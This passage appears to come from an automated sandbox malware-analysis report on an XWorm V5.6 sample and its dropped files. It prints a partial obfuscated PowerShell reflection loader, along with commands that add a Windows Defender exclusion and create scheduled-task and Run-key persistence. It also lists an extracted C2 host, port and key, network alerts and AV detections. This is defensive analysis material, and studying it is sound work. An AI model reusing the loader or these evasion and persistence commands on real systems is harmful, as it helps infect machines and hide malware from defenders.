efineMethod(''+[Char](73)+''+[Char](110)+''+[Char](118)+''+[Char](111)+''+[Char](107)+''+'e'+'',''+'P'+''+[Char](117)+'bl'+[Char](105)+''+[Char](99)+''+[Char](44)+''+[Char](72)+''+'i'+''+[Char](100)+'e'+'B'+''+[Char](121)+''+'S'+''+'i'+''+'g'+''+[Char](44)+''+[Char](78)+''+[Char](101)+''+[Char](119)+''+[Char](83)+''+[Char](108)+''+[Char](111)+''+'t'+','+[Char](86)+''+[Char](105)+'r'+[Char](116)+'u'+'a'+''+'l'+'',$duQqlSyxSK,$QBDRAqnALMmwja).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+[Char](110)+''+[Char](116)+''+[Char](105)+''+[Char](109)+'e'+[Char](44)+''+'M'+'a'+[Char](110)+''+[Char](97)+''+'g'+''+[Char](101)+''+[Char](100)+'');Write-Output $pNdjVVbnfJT.CreateType();}$RJkdRlkUxkpOh=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('Sy'+'s'+''+[Char](116)+''+[Char](101)+''+[Char](109)+''+[Char](46)+''+[Char](100)+'l'+[Char](108)+'')}).GetType(''+'M'+''+[Char](105)+''+[Char](99)+'r'+[Char](111)+''+'s'+''+[Char](111)+''+'f'+'t.W'+[Char](105)+'n'+[Char](51)+'2.'+[Char](85)+''+[Char](110)+'s'+[Char](97)+'f'+[Char](101)+'N'+'a'+''+[Char](116)+'iv'+[
                          Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:bubCglTffNzZ{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$QBDRAqnALMmwja,[Parameter(Position=1)][Type]$duQqlSyxSK)$pNdjVVbnfJT=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+'e'+''+[Char](102)+''+[Char](108)+''+[Char](101)+''+'c'+''+[Char](116)+''+[Char](101)+''+[Char](100)+''+[Char](68)+'e'+[Char](108)+''+[Char](101)+''+'g'+''+[Char](97)+''+[Char](116)+'e')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('I'+'n'+''+[Char](77)+''+'e'+''+[Char](109)+''+'o'+''+'r'+'y'+[Char](77)+'o'+[Char](100)+''+[Char](117)+'l'+[Char](101)+'',$False).DefineType(''+'M'+''+[Char](121)+'De'+'l'+'e'+[Char](103)+''+[Char](97)+''+[Char](116)+''+'e'+''+'T'+''+'y'+''+'p'+''+'e'+'',''+[Char](67)+''+[Char](108)+''+[Char](97)+''+[Char](115)+''+'s'+''+[Char](44)+''+[Char](80)+'u'+'b'+'l'+[Char](105)+''+[Char](99)+','+'S'+''+'e'+''+[Char](97)+''+[Char](108)+''+[Char](101)+'d,A'+[Char](110)+''+[Char](115)+'i'+[Char](67)+''+'l'+''+[Char](97)+''+[Char](115)+''+'s'+''+[Char](44)+'Au'+[Char](116)+''+'o'+''+[Char](67)+''+[Char](108)+''+'a'+''+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$pNdjVVbnfJT.DefineConstructor(''+[Char](82)+''+[Char](84)+'S'+[Char](112)+''+'e'+''+[Char](99)+''+[Char](105)+''+[Char](97)+''+[Char](108)+''+'N'+''+[Char](97)+'m'+[Char](101)+''+','+''+'H'+''+[Char](105)+''+'d'+''+'e'+''+[Char](66)+'y'+[Char](83)+'i'+'g'+''+[Char](44)+''+'P'+''+[Char](117)+''+[Char](98)+''+'l'+''+'i'+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$QBDRAqnALMmwja).SetImplementationFlags('R'+[Char](117)+''+'n'+'t'+[Char](105)+''+'m'+''+[Char](101)+''+[Char](44)+''+'M'+''+[Char](97)+''+[Char](110)+''+[Char](97)+''+[Char](103)+''+[Char](101)+''+[Char](100)+'');$pNdjVVbnfJT.DefineMethod(''+[Char](73)+''+[Char](110)+'
'+[Char](118)+''+[Char](111)+''+[Char](107)+''+'e'+'',''+'P'+''+[Char](117)+'bl'+[Char](105)+''+[Char](99)+''+[Char](44)+''+[Char](72)+''+'i'+''+[Char](100)+'e'+'B'+''+[Char](121)+''+'S'+''+'i'+''+'g'+''+[Char](44)+''+[Char](78)+''+[Char](101)+''+[Char](119)+''+[Char](83)+''+[Char](108)+''+[Char](111)+''+'t'+','+[Char](86)+''+[Char](105)+'r'+[Char](116)+'u'+'a'+''+'l'+'',$duQqlSyxSK,$QBDRAqnALMmwja).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+[Char](110)+''+[Char](116)+''+[Char](105)+''+[Char](109)+'e'+[Char](44)+''+'M'+'a'+[Char](110)+''+[Char](97)+''+'g'+''+[Char](101)+''+[Char](100)+'');Write-Output $pNdjVVbnfJT.CreateType();}$RJkdRlkUxkpOh=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('Sy'+'s'+''+[Char](116)+''+[Char](101)+''+[Char](109)+''+[Char](46)+''+[Char](100)+'l'+[Char](108)+'')}).GetType(''+'M'+''+[Char](105)+''+[Char](99)+'r'+[Char](111)+''+'s'+''+[Char](111)+''+'f'+'t.W'+[Char](105)+'n'+[Char](51)+'2.'+[Char](85)+''+[Char](110)+'s'+[Char](97)+'f'+[Char](101)+'N'+'a'+''+[Char](116)+'iv'+[
                          Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Public\DeadROOTkit.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Public\DeadROOTkit.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\Public\DeadROOTkit.exe" , ParentImage: C:\Users\Public\DeadROOTkit.exe, ParentProcessId: 5804, ParentProcessName: DeadROOTkit.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Public\DeadROOTkit.exe', ProcessId: 7176, ProcessName: powershell.exe
                          Source: Process started; Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems); Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Public\DeadROOTkit.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Public\DeadROOTkit.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\Public\DeadROOTkit.exe" , ParentImage: C:\Users\Public\DeadROOTkit.exe, ParentProcessId: 5804, ParentProcessName: DeadROOTkit.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Public\DeadROOTkit.exe', ProcessId: 7176, ProcessName: powershell.exe
                          Source: Network Connection; Author: Florian Roth (Nextron Systems), Tim Shelton; Data: DestinationIp: 208.95.112.1, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Users\Public\DeadROOTkit.exe, Initiated: true, ProcessId: 5804, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49730
                          Source: Process started; Author: frack113; Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Public\DeadROOTkit.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Public\DeadROOTkit.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\Public\DeadROOTkit.exe" , ParentImage: C:\Users\Public\DeadROOTkit.exe, ParentProcessId: 5804, ParentProcessName: DeadROOTkit.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Public\DeadROOTkit.exe', ProcessId: 7176, ProcessName: powershell.exe
                          Source: Registry Key set; Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split); Data: Details: C:\Users\Public\Deadsvchost.exe, EventID: 13, EventType: SetValue, Image: C:\Users\Public\DeadXClient.exe, ProcessId: 5324, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Deadsvchost
                          Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Public\DeadROOTkit.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Public\DeadROOTkit.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\Public\DeadROOTkit.exe" , ParentImage: C:\Users\Public\DeadROOTkit.exe, ParentProcessId: 5804, ParentProcessName: DeadROOTkit.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Public\DeadROOTkit.exe', ProcessId: 7176, ProcessName: powershell.exe
                          Source: File created; Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research); Data: EventID: 11, Image: C:\Users\Public\DeadXClient.exe, ProcessId: 5324, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Deadsvchost.lnk
                          Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Deadsvchost" /tr "C:\Users\Public\Deadsvchost.exe", CommandLine: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Deadsvchost" /tr "C:\Users\Public\Deadsvchost.exe", CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\Users\Public\DeadXClient.exe" , ParentImage: C:\Users\Public\DeadXClient.exe, ParentProcessId: 5324, ParentProcessName: DeadXClient.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Deadsvchost" /tr "C:\Users\Public\Deadsvchost.exe", ProcessId: 7244, ProcessName: schtasks.exe
                          Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Deadsvchost" /tr "C:\Users\Public\Deadsvchost.exe", CommandLine: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Deadsvchost" /tr "C:\Users\Public\Deadsvchost.exe", CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\Users\Public\DeadXClient.exe" , ParentImage: C:\Users\Public\DeadXClient.exe, ParentProcessId: 5324, ParentProcessName: DeadXClient.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Deadsvchost" /tr "C:\Users\Public\Deadsvchost.exe", ProcessId: 7244, ProcessName: schtasks.exe
                          Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM, CommandLine: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: C:\Windows\System32\dllhost.exe /Processid:{7d42e50e-8059-4906-9d19-fa399c842f66}, ParentImage: C:\Windows\System32\dllhost.exe, ParentProcessId: 6968, ParentProcessName: dllhost.exe, ProcessCommandLine: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM, ProcessId: 920, ProcessName: svchost.exe
                          Source: Process started; Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements); Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:bubCglTffNzZ{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$QBDRAqnALMmwja,[Parameter(Position=1)][Type]$duQqlSyxSK)$pNdjVVbnfJT=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+'e'+''+[Char](102)+''+[Char](108)+''+[Char](101)+''+'c'+''+[Char](116)+''+[Char](101)+''+[Char](100)+''+[Char](68)+'e'+[Char](108)+''+[Char](101)+''+'g'+''+[Char](97)+''+[Char](116)+'e')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('I'+'n'+''+[Char](77)+''+'e'+''+[Char](109)+''+'o'+''+'r'+'y'+[Char](77)+'o'+[Char](100)+''+[Char](117)+'l'+[Char](101)+'',$False).DefineType(''+'M'+''+[Char](121)+'De'+'l'+'e'+[Char](103)+''+[Char](97)+''+[Char](116)+''+'e'+''+'T'+''+'y'+''+'p'+''+'e'+'',''+[Char](67)+''+[Char](108)+''+[Char](97)+''+[Char](115)+''+'s'+''+[Char](44)+''+[Char](80)+'u'+'b'+'l'+[Char](105)+''+[Char](99)+','+'S'+''+'e'+''+[Char](97)+''+[Char](108)+''+[Char](101)+'d,A'+[Char](110)+''+[Char](115)+'i'+[Char](67)+''+'l'+''+[Char](97)+''+[Char](115)+''+'s'+''+[Char](44)+'Au'+[Char](116)+''+'o'+''+[Char](67)+''+[Char](108)+''+'a'+''+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$pNdjVVbnfJT.DefineConstructor(''+[Char](82)+''+[Char](84)+'S'+[Char](112)+''+'e'+''+[Char](99)+''+[Char](105)+''+[Char](97)+''+[Char](108)+''+'N'+''+[Char](97)+'m'+[Char](101)+''+','+''+'H'+''+[Char](105)+''+'d'+''+'e'+''+[Char](66)+'y'+[Char](83)+'i'+'g'+''+[Char](44)+''+'P'+''+[Char](117)+''+[Char](98)+''+'l'+''+'i'+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$QBDRAqnALMmwja).SetImplementationFlags('R'+[Char](117)+''+'n'+'t'+[Char](105)+''+'m'+''+[Char](101)+''+[Char](44)+''+'M'+''+[Char](97)+''+[Char](110)+''+[Char](97)+''+[Char](103)+''+[Char](101)+''+[Char](100)+'');$pNdjVVbnfJT.DefineMethod(''+
[Char](73)+''+[Char](110)+''+[Char](118)+''+[Char](111)+''+[Char](107)+''+'e'+'',''+'P'+''+[Char](117)+'bl'+[Char](105)+''+[Char](99)+''+[Char](44)+''+[Char](72)+''+'i'+''+[Char](100)+'e'+'B'+''+[Char](121)+''+'S'+''+'i'+''+'g'+''+[Char](44)+''+[Char](78)+''+[Char](101)+''+[Char](119)+''+[Char](83)+''+[Char](108)+''+[Char](111)+''+'t'+','+[Char](86)+''+[Char](105)+'r'+[Char](116)+'u'+'a'+''+'l'+'',$duQqlSyxSK,$QBDRAqnALMmwja).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+[Char](110)+''+[Char](116)+''+[Char](105)+''+[Char](109)+'e'+[Char](44)+''+'M'+'a'+[Char](110)+''+[Char](97)+''+'g'+''+[Char](101)+''+[Char](100)+'');Write-Output $pNdjVVbnfJT.CreateType();}$RJkdRlkUxkpOh=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('Sy'+'s'+''+[Char](116)+''+[Char](101)+''+[Char](109)+''+[Char](46)+''+[Char](100)+'l'+[Char](108)+'')}).GetType(''+'M'+''+[Char](105)+''+[Char](99)+'r'+[Char](111)+''+'s'+''+[Char](111)+''+'f'+'t.W'+[Char](105)+'n'+[Char](51)+'2.'+[Char](85)+''+[Char](110)+'s'+[Char](97)+'f'+[Char](101)+'N'+'a'+''+[Char](116)+'iv'+[

                          Persistence and Installation Behavior

                          Source: Process started; Author: Joe Security; Data: Command: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Deadsvchost" /tr "C:\Users\Public\Deadsvchost.exe", CommandLine: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Deadsvchost" /tr "C:\Users\Public\Deadsvchost.exe", CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\Users\Public\DeadXClient.exe" , ParentImage: C:\Users\Public\DeadXClient.exe, ParentProcessId: 5324, ParentProcessName: DeadXClient.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Deadsvchost" /tr "C:\Users\Public\Deadsvchost.exe", ProcessId: 7244, ProcessName: schtasks.exe
                          Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
                          2024-10-13T19:15:49.657430+0200 | 2853685 | 1 | A Network Trojan was detected | 192.168.2.4 | 49739 | 149.154.167.220 | 443 | TCP
                          2024-10-13T19:15:38.561396+0200 | 2855924 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49738 | 147.185.221.212 | 28600 | TCP


                          AV Detection

                          Source: mIURiU8n2P.exe; Avira: detected
                          Source: C:\Users\user\AppData\Local\DeadROOTkit.exe; Avira: detection malicious, Label: TR/Spy.Gen
                          Source: C:\Users\Public\DeadXClient.exe; Avira: detection malicious, Label: HEUR/AGEN.1305769
                          Source: C:\Users\Public\DeadCodeRootKit.exe; Avira: detection malicious, Label: TR/Dropper.MSIL.Gen
                          Source: C:\Users\Public\Deadsvchost.exe; Avira: detection malicious, Label: HEUR/AGEN.1305769
                          Source: C:\Users\Public\DeadROOTkit.exe; Avira: detection malicious, Label: TR/Spy.Gen
                          Source: 00000000.00000002.1703934967.0000000002781000.00000004.00000800.00020000.00000000.sdmp; Malware Configuration Extractor: Xworm {"C2 url": ["subscribe-bond.gl.at.ply.gg"], "Port": "28600", "Aes key": "<Xwormmm>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.6"}
                          Source: subscribe-bond.gl.at.ply.gg; Virustotal: Detection: 8%
                          Source: C:\Users\Public\DeadCodeRootKit.exe; ReversingLabs: Detection: 91%
                          Source: C:\Users\Public\DeadCodeRootKit.exe; Virustotal: Detection: 81%
                          Source: C:\Users\Public\DeadROOTkit.exe; ReversingLabs: Detection: 87%
                          Source: C:\Users\Public\DeadROOTkit.exe; Virustotal: Detection: 64%
                          Source: C:\Users\Public\DeadXClient.exe; ReversingLabs: Detection: 95%
                          Source: C:\Users\Public\DeadXClient.exe; Virustotal: Detection: 71%
                          Source: C:\Users\Public\Deadsvchost.exe; ReversingLabs: Detection: 95%
                          Source: C:\Users\Public\Deadsvchost.exe; Virustotal: Detection: 71%
                          Source: C:\Users\user\AppData\Local\DeadROOTkit.exe; ReversingLabs: Detection: 87%
                          Source: C:\Users\user\AppData\Local\DeadROOTkit.exe; Virustotal: Detection: 64%
                          Source: mIURiU8n2P.exe; ReversingLabs: Detection: 73%
                          Source: mIURiU8n2P.exe; Virustotal: Detection: 67%
                          Source: Submitted Sample; Integrated Neural Analysis Model: Matched 100.0% probability
                          Source: C:\Users\user\AppData\Local\DeadROOTkit.exe; Joe Sandbox ML: detected
                          Source: C:\Users\Public\DeadXClient.exe; Joe Sandbox ML: detected
                          Source: C:\Users\Public\DeadCodeRootKit.exe; Joe Sandbox ML: detected
                          Source: C:\Users\Public\Deadsvchost.exe; Joe Sandbox ML: detected
                          Source: C:\Users\Public\DeadROOTkit.exe; Joe Sandbox ML: detected
                          Source: mIURiU8n2P.exe; Joe Sandbox ML: detected
                          Source: 2.0.DeadROOTkit.exe.1a0000.0.unpack; String decryptor: updates-full.gl.at.ply.gg
                          Source: 2.0.DeadROOTkit.exe.1a0000.0.unpack; String decryptor: 60075
                          Source: 2.0.DeadROOTkit.exe.1a0000.0.unpack; String decryptor: <123456789>
                          Source: 2.0.DeadROOTkit.exe.1a0000.0.unpack; String decryptor: <Xwormmm>
                          Source: 2.0.DeadROOTkit.exe.1a0000.0.unpack; String decryptor: USB.exe
                          Source: 2.0.DeadROOTkit.exe.1a0000.0.unpack; String decryptor: BTC_Address
                          Source: 2.0.DeadROOTkit.exe.1a0000.0.unpack; String decryptor: ETH_Address
                          Source: 2.0.DeadROOTkit.exe.1a0000.0.unpack; String decryptor: TRC20_Address
                          Source: 2.0.DeadROOTkit.exe.1a0000.0.unpack; String decryptor: Your_Token
                          Source: 2.0.DeadROOTkit.exe.1a0000.0.unpack; String decryptor: Your_ID
                          Source: C:\Users\Public\DeadCodeRootKit.exe; Code function: 3_2_00B01000 CryptAcquireContextW,CryptGenRandom,CryptReleaseContext,3_2_00B01000
                          Source: mIURiU8n2P.exe; Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                          Source: unknown; HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49739 version: TLS 1.2
                          Source: mIURiU8n2P.exe; Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                          Source: Binary string: .@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb source: svchost.exe, 00000017.00000000.1840584622.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000017.00000002.2942503144.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp
                          Source: Binary string: .@\??\C:\Users\user\AppData\Local\Temp\wctAB5F.tmp.pdb source: svchost.exe, 00000017.00000000.1840558344.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000017.00000002.2941691166.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
                          Source: Binary string: (@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: svchost.exe, 00000017.00000002.2940183395.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000017.00000000.1840509505.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp
                          Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: svchost.exe, 00000017.00000000.1840558344.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000017.00000002.2941691166.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
                          Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: svchost.exe, 00000017.00000000.1840558344.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000017.00000002.2941691166.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
                          Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: svchost.exe, 00000017.00000002.2940183395.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp
                          Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2.pdbr source: svchost.exe, 00000017.00000000.1840558344.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000017.00000002.2941691166.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
                          Source: Binary string: "@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb source: svchost.exe, 00000017.00000000.1840584622.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000017.00000002.2942503144.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp
                          Source: Binary string: WINLOA~1.PDB source: svchost.exe, 00000017.00000000.1840558344.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000017.00000002.2941691166.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
                          Source: Binary string: *@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb source: svchost.exe, 00000017.00000000.1840584622.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000017.00000002.2942503144.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp
                          Source: Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: svchost.exe, 00000017.00000002.2940183395.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000017.00000000.1840509505.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp
                          Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: svchost.exe, 00000017.00000000.1840558344.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000017.00000002.2941691166.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
                          Source: Binary string: @\??\C:\Users\user\AppData\Local\Temp\wct3D66.tmp.pdb source: svchost.exe, 00000017.00000000.1840584622.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000017.00000002.2942503144.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp
                          Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: svchost.exe, 00000017.00000002.2940183395.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000017.00000000.1840509505.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp
                          Source: Binary string: *@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb* source: svchost.exe, 00000017.00000000.1840584622.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000017.00000002.2942503144.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp
                          Source: Binary string: "@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: svchost.exe, 00000017.00000000.1840584622.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000017.00000002.2942503144.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp
                          Source: Binary string: ,@\??\C:\Users\user\AppData\Local\Temp\wmsetup.log.pdb source: svchost.exe, 00000017.00000000.1840558344.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000017.00000002.2941691166.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
                          Source: Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: svchost.exe, 00000017.00000002.2940183395.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000017.00000000.1840509505.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp
                          Source: Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: svchost.exe, 00000017.00000000.1840584622.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000017.00000002.2942503144.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp
                          Source: C:\Users\Public\DeadCodeRootKit.exe; Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
                          Source: C:\Users\Public\DeadCodeRootKit.exe; Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
